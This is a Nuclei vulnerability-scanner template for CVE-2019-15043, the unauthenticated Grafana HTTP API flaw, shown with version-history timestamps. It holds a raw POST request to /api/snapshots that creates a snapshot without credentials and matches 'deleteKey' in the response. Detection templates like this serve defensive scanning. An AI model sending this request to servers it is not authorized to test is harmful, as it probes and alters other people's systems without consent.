nuclei-templates/cves/2019/CVE-2019-15043.yaml

36 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-15043
2020-07-04 13:05:56 +00:00
info:
author: bing0o
name: Grafana unauthenticated API
severity: high
2021-03-30 06:50:02 +00:00
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference:
2021-03-30 06:50:02 +00:00
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
2021-03-30 06:50:02 +00:00
- https://community.grafana.com/t/release-notes-v6-3-x/19202
tags: cve,cve2019,grafana
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.50
cve-id: CVE-2019-15043
cwe-id: CWE-306
2020-07-04 13:05:56 +00:00
requests:
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
2020-07-04 13:05:56 +00:00
matchers:
- part: body
type: word
words:
- deleteKey